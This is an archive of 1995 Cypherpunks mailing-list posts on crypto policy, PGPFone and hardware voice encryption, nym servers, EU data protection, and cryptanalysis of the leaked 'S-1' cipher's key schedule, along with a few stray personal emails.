> cheap and self contained and idiot proof. "but it's difficult
> to make anything foolproof, because fools are so ingenious" <g>
>
This can be done with hacked telephones probably.  A switch in the 
telphones that then takes the line over turning it into a data connection 
and negotiating keys etc.. with the remote side which would have a 
similiarly equipped telephone.  It may already be done, but rather 
prohibitevly expensive for common use.
 
> this is an extremely useful model: "big fish provider" gives
> a capability that people want, namely processing time and
> disk space. they think they can regulate the uses of their
> system, but if there is enough degrees of freedom, they 
> cannot, and people can actually simulate the services they
> want on the system regardless of what the system operators
> wish to control or not control.
>
not true really, most providers shut off accounts that run SLIRP if they 
also offer SLip/PPP service to customers. I know MCSnet did.  but 
SLIP/PPP was only five dollars more a month and offered much better 
performance.
 

"I regret that I have but six orifices to give you" -Nesta Stubbs
/-/ a s t e  http://www.mcs.net/~nesta/home.html Angeli Caduti Assasin


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCueoDMPw/Yr5YDZAQEfRgQAjmBFu4Oqg4XhIh+pG2/smvP7Eg8/cHP/
bgrtErzQudyjre5Bxind0AK54fGdsJf21kZK0BESxgspA9+K5w/970UfyVFTwIaL
LTQgSdqezyMx3S0HMJYoWvH5xJ3sOmHMGnq7n3hQVFoBMaVCfvUnUiUJodPr5Wd0
/TXBL5TSUSM=
=6qJf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Fri, 11 Aug 95 15:32:04 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: your mail
Message-ID: <199508112229.PAA17698@mail.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


At 02:28 PM 08/11/95 -0400, K. M. Ellis wrote:
>SHUT UP.
>

That was entirely useless.  1) You directed your mail to a dummy address
representing an anonymous remailer.  2) You wasted even more bandwidth,
time, and disk space by posting yet another useless post to cypherpunks.

Please note the To: and Cc: fields carefully next time you address a mail!

--
William Ono <wmono@direct.ca>                                     PGP 2902B621
 fingerprint = 51 6B BC 81 57 D8 FF 6A  5A A1 A4 6B 9A E3 E5 EE = fingerprint
PGP-encrypted mail welcome!                              Witty Quote Goes Here






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 07:37:00 PDT
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: Australia, EU crypto ill news, crypto wars
Message-ID: <10374.9508111435@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > a) Lobbying - hopeless IMO, they aren't interested in listening, the
> >    politicos are just too easy to manipulate and the "masses" aren't
> >    clueful enough of what crypto means to understand the implications,
> >    or even notice.
> 
> The "masses" are not that clueless (remember the 80% against Clipper
> in a US poll a year ago). 

It depends how it is packaged to the voter, if it is even presented at
all (as you note below so much gets quitely swept through, and
presented fait-a-compli once they've already signed some euro deal).

The US at least makes a token of having public debate, I wouldn't be
suprised to see little to no coverage of this in the UK for instance.
If it was worded as 'government wants to force taps on all your
phones' as presumably the clipper vote was, then you might get a
reaction, but if it's worded as a way to keep tabs on all those evil
child pornagraphs who teem in the countless millions on the internet,
well it's not so eady to convince people.  Some folks still have a
mistaken belief that because that nice police man says that we need to
do this to protect our children then it is so.

Also note that Clipper wasn't completely quashed, Clinton elected to
use it for government contractors, and government official business
where crypto would be used, by presidential decree.  Not a very
democratic move, and still a ploy to get the thing accepted by
misspent government money in creating a market for the things, and
mandating it's use in defense contracting work for the government.

> The problem 'here' in the EU is the smartly construed distance
> between commons and rulers. We vote for members of a debate club
> (who are very generously paid out of tax money) lacking any power
> whatsoever. The EU decision on crypto-policy will emerge from closed
> chambers of the Commission, and in every member country the local
> politicians will announce that 'it has been decided by EU and there
> is nothing we can do about it, even if we would like to'.

Sure that's exactly the approach taken to ram these things down our
throats with out public debate.

> But this doesn't mean that national freedom-of-(crypto)speech
> campaigns will be useless.  Civil disobedience, still very common
> amongst European citizens faced with ridiculous EU regulations, will
> be more likely to thrive if the legitimacy of crypto regulations is
> publically questioned in a continuous mode.

Civil disobedience is a nice way to protest obvious nonsense, of
course, but doesn't help financial institutions who will be by law
required to use escrowed encryption with the AU govt holding the keys
(in the case of the AU example government current line).  Where's your
privacy then?  You must fight for it, whilst your very efforts are
illegal, and these ludicrous laws can then be selectively enforced
depending on the whims of some arbitrary power.

> A significant difference between (for example) Sweden and USA is the
> punishment scales. Suppose Sweden had an ITAR (which it
> hasn't). Almost everyone would laughingly export PGP and Wei's
> library anyway, because the remote possibility of prosecution
> (assuming similarities with the current situation in the US) would
> hardly feel like a threat. A conviction would result in a few 100$
> fine, maximum. 

Liveable, as you could view it as a 'freedom tax', but unjust.

> An *enforced* ban on crypto in Scandinavia is remote enough that I'm
> confident 'SuperStego for Windows' will be out in ver 7.3b by then.

Well there's several issues: should they be allowed to do this (no
way), and will they get away with it in the current level of crypto
awareness (probably IMO), and will it be an effective deterrant
(depends, the US one seems to keep US companies out of crypto, even
though it has probably aided rather than hindered PGPs popularity),
and is it enforceable (well ultimately no, due to good stego - your
'SuperStego for Windows' v 7.3b).

If you're confidence in Swedens resistance to big brotheresque crypto
regs is justified, well perhaps a bevy of political thought criminals
will come live in Sweden to escape their own repressive regimes.  Hows
the job market for unix hackers?

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Fri, 11 Aug 95 14:01:11 PDT
To: "Vladimir Z. Nuri" <shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02130505ac515bae047a@[134.84.101.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 am 8/11/95, Vladimir Z. Nuri wrote:
[snip]
>>I can't violate my NDA, but PGPFone will be a *major* revolution for
>>communication security. I would not be surprised to see several hundred
>>thousands of users. PGP will plale in comparison.
>
>I sincerely doubt this. if someone could find a way of doing 
>voice encryption through simple idiotproof hardware adapters
>(I am thinking of cups that you could attach to any standard phone)
[snip]

Am I the one of the few who thinks that PGPFone is the biggest CypherPunk event for years? I think it will be even more significant if we get strong encryption built into the low level infrastructure of Internet as Perry and others are pursuing but that isn't an event that will be big news next week. A lot of people who don't usually think or talk about fundamental issues of privacy and technology will be doing so next week. I hope that some of the people here who have contacts in the press are ready to say useful and clarifying things to reporters who would be just as happy to concentrate on usual suspects (drug dealers, et al).

On the speculation of attaching cups to a standard phone I think this has an air of unreality. To apply strong encryption you need a digital signal. That doesn't necessarily imply a computer but sufficiently powerful computers are going into people's homes at an astonishing rate already. I use MegaPhone on my Quadra 660av at home and I can't wait to try out PGPFone. Even without PGPFone I have thought for a while that computer based telephony is getting ready to take off. Combining CallerID, customized call handling, high quality speakerphone capability and a truly useful personal directory (TouchBase Pro is too sluggish, but getting there) there were already the ingredients of substantive usefulness. If you can add in street maps fetched with an AppleEvent or even a QTVR enhanced map then you get something that might make even an AT&T ad envious. Adding complete privacy (relative to previous levels available) and possibly authentication makes this a very big event.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lat@iac.net (Lynn TerWoerds)
Date: Mon, 14 Aug 95 17:39:16 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <v01520d00ac50f4fd6327@[199.6.41.57]>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous remailer? What a crock! In my book, you might as well have
written this rant on swift moving water or the wind.

Lynn TerWoerds
Cincinnati, OH






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 11 Aug 95 15:09:17 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <Pine.BSI.3.91.950811164809.28774C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:

> 
> when someone invents cheap hardware that you can just plug
> on top of any existing phone, i.e. "the phone adaptor", TPA?,
> *that's* when the world is going to go crazy with crypto.

It's closer than you think.  I've been messing with TI's 
Digital Signal Processing DSK.  For $99 you get a DSP
with audio in, audio out and 10k of memory.  Reference
implementations of : DTMF encoders/decoders; 300, 1200, 2400 baud
modem programs; and voice processing software already exist.

The TI Linear Products Transmission, Switching, Subscriber,
and Transient Suppressors Data Book is sitting on my desk
along with the Data Transmission and Control Circuits (etc)
Data Book.  Combined with the pinouts and software that
came with DSP DSK I've been painfully trying to piece
together how one might glue up a telephone interface.

Unfortunately, I'm a software guy and am still learning.

In any case, assuming Joe STUD Hardware Guy was willing
to make a daughterboard with a 64k memory module (10k is
just not enough) with an FCC approved telephone interface
(available from parts suppliers).  You could have a 25 MIPS
based personal STU.  I'm envisioning a 'black box' with
two RJ-11 jacks which daisy chained in with your phone
like a modern modem.  Triggering key exchange could be
a simple DTMF sequence.  

Ultimately, the device could be combined into a single
board eliminating parts, reducing space, and lowering
power supply requirments.  The DSP DSK currently needs
~14 Volts AC.   I'd like to see that black box
portable and able to use some nine volt or AA batteries.



> all this stuff that requires lots of hardware can be used,
> but the thing that will cause *everyone* to use it is when
> someone invents a TPA. I'm very, very surprised that no 
> one has tried to do this yet.
> 

In any case, I'm trying to do it, but my efforts will never
realise a commericial result.  I just don't have the money
to buy parts in bulk, and without doing that units would be
$200-$500 each.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 11 Aug 95 14:24:45 PDT
To: hfinney@shell.portal.com
Subject: Re:  More "S-1" foolishness
In-Reply-To: <199508111809.LAA02095@comsec.com>
Message-ID: <9508112119.AA13790@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 10 Aug 1995 20:53:58 -0700
>From: Hal <hfinney@shell.portal.com>
>
>The other thing I noticed that really makes me question this is that G1
>only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
>parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
>imagine why it would do this intentionally.  G1 may not be that important
>an element of the cipher but why throw away four bits?

Not that I say this is real, but...

I can maybe understand throwing out 4 of the bits if G0 picks them up.  G1
is never used alone.

However, has anyone already noted that

	fullkey[INTEGRITY][i][j] = 0x08 ;

for all i and j?

For that matter, fullkey will be a constant for any key with all the bytes
the same.  This might constitute a class of weak keys.


 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 14:58:24 PDT
To: cypherpunks@toad.com
Subject: Still more "S-1" foolishness
Message-ID: <199508112206.SAA27354@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a table of where the expanded key schedule bits come from
(I think - this could be wrong, I had to tweek some of the output
by hand).  Note that some key bytes are used much more often, and
in more positions, than others, but every key byte does at least
end up being used as input to each F eventually (but not always to
each "target" byte).

Sorry for the opaque notation; this reads best when used in conjunction
with Colin's cool graph that he posted to sci.crypt last night.

-matt



   |    | G0   G1  F+0  F+1  F+2  F+3   (function input)
   bytes| 4    5    2    3    0    1    (mixed with byte #)
rou|enc-| all  all R+6L R+6H R+7L R+7H  (output affects)
nd |rypt| 0    1    2    3    4    5    (key schedule byte #)
 # |ed  |LLHH LLHH LLHH LLHH LLHH LLHH  (posn of orig key byte in sched byte)
======================================
 0  76   5954 9538 5495 4851 8515 5151
 1  54   1510 5194 1051 0415 4171 1717
 2  32   7176 1750 7617 5071 0737 7373
 3  10   3732 7316 3273 1637 6393 3939
 4  67   9398 3972 9739 7293 2959 9595
 5  54   5954 9538 5495 4851 8515 5151
 6  32   1510 5194 1051 0415 4171 1717
 7  10   7176 1750 7617 5071 0737 7373
 8  76   3732 7316 3273 1637 6393 3939
 9  54   9398 3972 9739 7293 2959 9595
10  32   5954 9538 5495 4851 8515 5151  (original key bytes used)
11  10   1510 5194 1051 0415 4171 1717
12  76   7176 1750 7617 5071 0737 7373
13  54   3732 7316 3273 1637 6393 3939
14  32   9398 3972 9739 7293 2959 9595
15  10   5954 9538 5495 4851 8515 5151
16  76   1510 5194 1051 0415 4171 1717
17  54   7176 1750 7617 5071 0737 7373
18  32   3732 7316 3273 1637 6393 3939
19  10   9398 3972 9739 7293 2959 9595
20  76   5954 9538 5495 4851 8515 5151
21  54   1510 5194 1051 0415 4171 1717
22  32   7176 1750 7617 5071 0737 7373
23  10   3732 7316 3273 1637 6393 3939
24  76   9398 3972 9739 7293 2959 9595
25  54   5954 9538 5495 4851 8515 5151
26  32   1510 5194 1051 0415 4171 1717
27  10   7176 1750 7617 5071 0737 7373
28  76   3732 7316 3273 1637 6393 3939
29  54   9398 3972 9739 7293 2959 9595
30  32   5954 9538 5495 4851 8515 5151
31  10   1510 5194 1051 0415 4171 1717




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 15:13:20 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: More "S-1" foolishness
In-Reply-To: <9508112119.AA13790@tis.com>
Message-ID: <199508112221.SAA27518@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>For that matter, fullkey will be a constant for any key with all the bytes
>the same.  This might constitute a class of weak keys.

Interestingly, though, such keys are not weak in the sense that the
all-zero/all-one key is weak in DES.  There doesn't seem to be any
obvious way to key it such that encryption == decryption.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 19:27:28 PDT
To: Bryan Strawser <cypherpunks@toad.com
Subject: Re: Nym Server Development....
Message-ID: <ac515e9d07021004af05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've removed these from this folllow-up: remailer-operators@c2.org,
nyms@sephiroth.org, alt.privacy.anon-server@canaima.ME.berkeley.edu)

At 2:04 AM 8/12/95, Bryan Strawser wrote:
>John Fleming, along with a bit of support help from myself, is developing
>a nym server that he is intending to release to the public once we are
>satisfied with the performance and the state of the code.

What is your working definition of "nym server"?


>At this point and time, John has pushed the code to the point where we
>have am experimental nym server operating that is being constantly
>refined and features added. Along the same lines, I am presently
>working on solid documentation for when the nymserver is ready for
>public use, and for the later public release of the code.
>
>John created a mailing list for those interesting in contributing to the
>development of his nymserver and as a forum for discussion of nymserver
>related issues.  So far, there have been few folks subscribed, and no
>answer from those that are presently subscribed to the list.  I find
>this rather disappointing.

Maye there's little interest because I can't find any threads that discuss
just what a "nym server" is. I can make some guesses as to what _I_ might
call a nym server, but there are some important issues (of who keeps the
records, and why a nym server is better than just using unforgeable sigs,
etc.) that need discussing.


>that are running today.  Just like the other types of anonymity out
>there, a nymserver has many viable reasons for existance.  The lack of
>publically available code for such a server, as there is for remailers,
>should motivate us to get behind John and his efforts.

Why should we get behind an effort that has not been spelled out or
discussed here? Maybe I'm missing the debate in the groups I deleted (see
above), but I really don't know what it's about.

>To subscribe to the nymserver development & discussion forum, send
>a message to majordomo@sephiroth.org with the line "subscribe nyms
><your name>" in the body of the message.  Questions about the
>nymserver should be directed to that list so that all can be involved
>in the development.

Sorry, Bryan, but I don't typically join mailing lists so I can find out
what the subject of a mailing list is! :-}

Describe for us what you have in mind for "nym servers" and why they are
important, then maybe more folks will get involved.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Fri, 11 Aug 95 12:13:57 PDT
To: CypherPunks <cypherpunks@toad.com>
Subject: Re: EU Data Protection
In-Reply-To: <199508041840.OAA01729@clark.net>
Message-ID: <9508112013.aa23273@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508041840.OAA01729@clark.net>, Ray Cromwell writes:
>  Just more evidence for why even "well meaning" policywonks are dangerous.
>Take for instance the rule that "data must be kept up to date and accurate"
>How up to date and what is accuracy? So if I have a commercial web page
>which records transactions on my server, and I stop logging and keep
>year old records, do some statistic processing on them, I am in
>violation for having stale data. 

	If I remember the Irish data protection laws accurately, the idea
is to keep innaccurate data on individials (and, possibly, companies). I
doubt if data which cannot be used to identify individuals would qualify.
(There is a small exemption for clubs, I can't remember the details exactly.)
Assuming the same model is being proposed where you are, I doubt if it would
mean you could be prosecuted for holding old transaction records, just ones
that either (i) are out of date because someone may be listed as not having
paid when they have or (ii) record transactions that didn't take place.

>  And what the hell is "accurate" data? All information about other people is 
>subjective. I should be entitled to record any statistics about you for my 
>use that I want. Just by interacting with me you transmit information. If
>I interact with you and get the "wrong impression" about what type of
>person you are, am I in violation for storing inaccurate data? (e.g. if
>I write in my computerized diary "I think John Smith is a jerk.")

	I think you miss an important point; your opinion is subjective, but
data can relate to objective facts (e.g. credit records). Would you take the
same stance if a credit bureau claimed that you couldn't pay back half the
loans you took out?

	What worries me about the *lack* of some form of data protection
legislation is that is allows someone to build up a database of information
which is a mishmash of truth, misunderstandings and lies. How would you feel if
"Concerned Citizens against Cryptography" compiled a list of all members
of this list, branding them as `dangerous, possibily criminal subversives'?
What if that opinion was spread to other databases? How about the police
investigating you because of this kind of database?

>  How will this law affect reputation servers? If my reputation server
>has what you consider a bad review of you, am I in violation?

	Personally, I wouldn't take a reputation server seriously; after all
if you labelled me a jerk, I could do the same to me on my own server! :-)

	Seriously, I don't think something as frivilous as a reputation
server should be illegal, but anything that records information about
individuals that could result in harm to said individuals (e.g. by falsely
branding them a bad credit risk, falsely claiming them to have a criminal
record, etc.)

>  Privacy should be implemented via cryptography, not obscure politcal
>machines which are doomed to fail and produce a black market for 
>personal data anyway.

	I'm sorry, but I don't think this marked metaphor holds here.

	Derek Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vicki Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:41:48 PDT
To: epi@tyrell.net
Subject: Access
Message-ID: <199508120137.AA29946@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Fri, 11 Aug 1995 09:54:57 -0400
>From: FrFunston@aol.com
>Message-Id: <950811095455_52556775@aol.com>
>To: penny@tyrell.net
>Subject: Re: A quick prayer
>Status: RO
>
>In Anglican Forum, you wrote:
>
>>My son and I also like to sit on the back deck in the evening when it is
>>cool enough to watch and listen to the wonders of creation.
>
>Vicky -- when recently in Kansas City has this been possible?

Actually, it's been rather hot, lately!  I do manage to get out some evenings.
We have two great big elm trees that provide great shade.  I also like to
get out early in the morning and do my prayers!  Thanks, too, for your
invitation to visit on Sunday - this is difficult because I am the organist
at St. Peter's!  But, if I ever have the chance, I would really like to
do that.  Maybe there is a weekday service some time?
>
>By the way, what internet access do you use?  I'm on AOL but for some of my
>uses, a less costly Web surfer would be really great.  I've had some
>difficulty finding what's available locally.

My husband has subscribed to a service called Tyrell that is based here in
town that connects to the Internet.  Call (816) 454-6788 with your modem
and log in as "info" for rates and features.  They offer thirty hours of
connect time a month for $10.00 and $.75 for every hour used after that.
It's not as user friendly as AOL and we have an older computer set.  You
can get something in windows that Tyrell supports that will make it very
user friendly.

There is a one time activation charge of $9.00.  You can also pay a lump
sum of $90.00 per year for the same 30 hours a month.

God Bless!  Vicki




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vicki Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:41:52 PDT
To: epi@tyrell.net
Subject: hard hymns
Message-ID: <199508120137.AA29980@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



>Ok, I guess I'll jump in here, too.  Since I am an organist, I will
list a few hymns I've noticed the congregation having difficulty
singing:

#56  O Come, O Come, Immanuel  - in the new hymnal, it has been changed
to be more authentic, but since people are used to the 1940 timing, they
stumble every time.

#688  A Mighty Fortress - Same reason as above.

#208  The Strife is O'er - they do great on the verse, but really, I
have never figured out what they do on the Antiphon!!!  They certainly
aren't with me!

In our congregation - any hymn not previously in the 1940 hymn book!
They always groan afterwards - "we don't know that one."  Also, "we
can't do a new hymn at the beginning, the choir would stumble coming in",
"we can't do a new hymn at the Gospel - too important a place", we can't
do a new hymn post communion - it would interfere with devotion and
thanksgiving after Eucharist and we don't want to irritate people" and
"we can't do a new hymn at the end because the choir would stumble and
we need to end on a familiar uplifting note."  If anyone else has
experienced this sort of thing, I would welcome suggestions.  I am hoping
that our new rector, when he arrives in October, will also be able to
help!

Vicki Penny
St. Peter's - Kansas City




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:48:21 PDT
To: cypherpunks@toad.com
Subject: Oops, Sorry
Message-ID: <199508120143.AA00904@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry about the noise. The letter from Vicki Penny was from a snarled
up script that ran astray.

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Fri, 11 Aug 95 19:06:39 PDT
To: alt.privacy.anon-server@canaima.ME.berkeley.edu
Subject: Nym Server Development....
Message-ID: <199508120204.VAA13172@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


John Fleming, along with a bit of support help from myself, is developing
a nym server that he is intending to release to the public once we are
satisfied with the performance and the state of the code.

At this point and time, John has pushed the code to the point where we
have am experimental nym server operating that is being constantly
refined and features added. Along the same lines, I am presently
working on solid documentation for when the nymserver is ready for
public use, and for the later public release of the code.

John created a mailing list for those interesting in contributing to the
development of his nymserver and as a forum for discussion of nymserver
related issues.  So far, there have been few folks subscribed, and no
answer from those that are presently subscribed to the list.  I find
this rather disappointing.

This is your chance to get involved in developing this server.  There has
been alot of interest expressed in nymservers on this list previously,
as well from other folks that presnetly use the type I and II remailers
that are running today.  Just like the other types of anonymity out
there, a nymserver has many viable reasons for existance.  The lack of
publically available code for such a server, as there is for remailers,
should motivate us to get behind John and his efforts.

To subscribe to the nymserver development & discussion forum, send
a message to majordomo@sephiroth.org with the line "subscribe nyms
<your name>" in the body of the message.  Questions about the
nymserver should be directed to that list so that all can be involved
in the development.

Thanks for your input,

Bryan



-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 21:36:27 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d00ac51eb0ea681@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 8/11/95, Vladimir Z. Nuri wrote:

>the real holy grail for voice communication encryption is
>when this stuff starts to get integrated into the real
>phone system, or people start making hardware that is
>cheap and self contained and idiot proof. "but it's difficult
>to make anything foolproof, because fools are so ingenious" <g>
[...]
>when someone invents cheap hardware that you can just plug
>on top of any existing phone, i.e. "the phone adaptor", TPA?,
>*that's* when the world is going to go crazy with crypto.
>all this stuff that requires lots of hardware can be used,
>but the thing that will cause *everyone* to use it is when
>someone invents a TPA. I'm very, very surprised that no
>one has tried to do this yet.

As some of you know, I work for a LAN-Telephony company. One of our
products is a hardware based computer telephony product that we will be
able to provide at less than $100 per node. The product contains a CPU as
well as a DSP and is ideally suited for voice transmission with encryption
over networks.

We inted to make this product fully interoperate with software based
PGPFone implementations and also lending our computer telephony experience
to the PGPFone development team. This cooperation will provide hundreds of
thousands of corporate users with PGPFone compatible, rock solid, call
security at a fraction of the cost of today's "secure" phones. Our
expertise will also help improve the performance of the software based
freeware PGPFone implementations.

Sorry, I am unable to provide more details at this point.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Fri, 11 Aug 95 19:50:46 PDT
To: feanor@anduin.gondolin.org
Subject: No Subject
Message-ID: <199508120242.VAA00212@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


In a previous message, Timothy C. May said...
> 
> What is your working definition of "nym server"?

There have been discussions concernign this before both on here
and other mailing lists, such as remailer-operators.  A nym
server is an operation similar to anon.penet.fi, but more secure.  Sameer
has two of these operating now that uses PGP encrypted reply blocks
and such.  [omega.c2.org and alpha.c2.org, both of which use different
operating methods] 

What John is attempting to do is have a nymserver like anon.penet.fi,
where folks can create an alias and send/recieve mail/postings to it.  
However, unlike Julf's system, a secure nymserver would prevent the owner 
from being able to divulge who the real-life person is behind the
alias because of the PGP encrypted reply block and other options
involved.

Bryan

-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Fri, 11 Aug 95 19:45:22 PDT
To: cypherpunks@toad.com
Subject: Euro Comm Adopts Privacy Directive (NewsClip)
Message-ID: <199508120245.VAA05377@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




European Commission Adopts Privacy Directive


Brussels, Aug. 11, -- The European Commission is now well on
its way towards affording a high level of protection to
personal data held on computer systems, following the formal
adoption of a Directive on the protection of personal data,
Newsbytes has learned.
 
"I am pleased that this important measure, which will ensure
a high level of protection for the privacy of individuals in
all Member States, has been adopted with a very wide measure
of agreement within the Council and European Parliament," said
EC Single Market Commissioner Mario Monti, announcing the
measure.
 
According to Monti, the Directive will also help to ensure the
free flow of information society services in the "Single
Market" by "fostering consumer confidence and minimizing
differences between member states' rules."
 
"Moreover, the text agreed includes special provisions for
journalists, which reconcile the right to privacy with freedom
of expression," he said, adding that the member states must
transpose the Directive within three years (i.e., write it
into their own legislation), "but I sincerely hope that they
will take the necessary measures without waiting for the
deadline to expire so as to encourage the investment required
for the information society to become a reality."
 
Monti claims that the Directive will establish a "clear and
stable" regulatory framework necessary to guarantee free
movement of personal data, while leaving individual EU
countries room for maneuver in the way the Directive is
implemented.
 
According to the Directive, free movement of data is
particularly important for all services with a large customer
base and depending on processing personal data, such as
distance selling and financial services.
 
In practice, however, banks and insurance companies process
large quantities of personal data on such highly sensitive
issues as credit ratings and credit-worthiness. If each member
state had its own set of rules on data protection, for
example, on how data subjects could verify the information
held on them, cross-border provision of services, notably over
the information superhighways, would be virtually impossible
and this extremely valuable new market opportunity would be
lost, the EC claims.
 
According to the EC, the Directive aims to narrow divergences
between national data protection laws to the extent necessary
to remove obstacles to the free movement of personal data
within the EU. As a result, any person whose data is processed
in the EC will be afforded an equivalent level of protection
of his rights, in particular his right to privacy,
irrespective of the member state where the processing is
carried out.
 
The EC claims that, until now, differences between national
data protection laws have resulted in obstacles to transfers
of personal data between EC member states, even when these
countries have ratified the 1981 Council of Europe Convention
on personal data protection. This has been a particular
problem, the EC notes, for multinational companies wishing to
transfer data concerning their employees between their
operations in different member states.
 
According to the Commission, such obstacles to data transfers
could seriously impede the future growth of information
society services.
 
The Directive establishes the principle of "fairness," so that
a collection of data should be as transparent as possible,
giving individuals the option of whether they provide the
information or not.

The Directive requires all data processing to have a proper
legal basis. The legal grounds defined in the Directive are:
consent, contract, legal obligation, vital interest of the
data subject, and the balance between the legitimate interests
of the people controlling the data and the people on whom data
is held (i.e., data subjects). This balance gives member
states room for maneuver in their implementation and
application of the Directive, the Commission claims.
 
Press & Reader Contact: European Commission, +32-299-1111

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 22:09:28 PDT
To: Ray Cromwell <vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d01ac51ef81b1df@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:42 8/11/95, Ray Cromwell wrote:

>I would like to see a secure voice communication protocol that is divorced
>from the particular details of the algorithms used (although a
>base level of some voice compression technique + DES + RSA will have to
>be used) That way, new and better algorithms can be dropped in depending
>on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
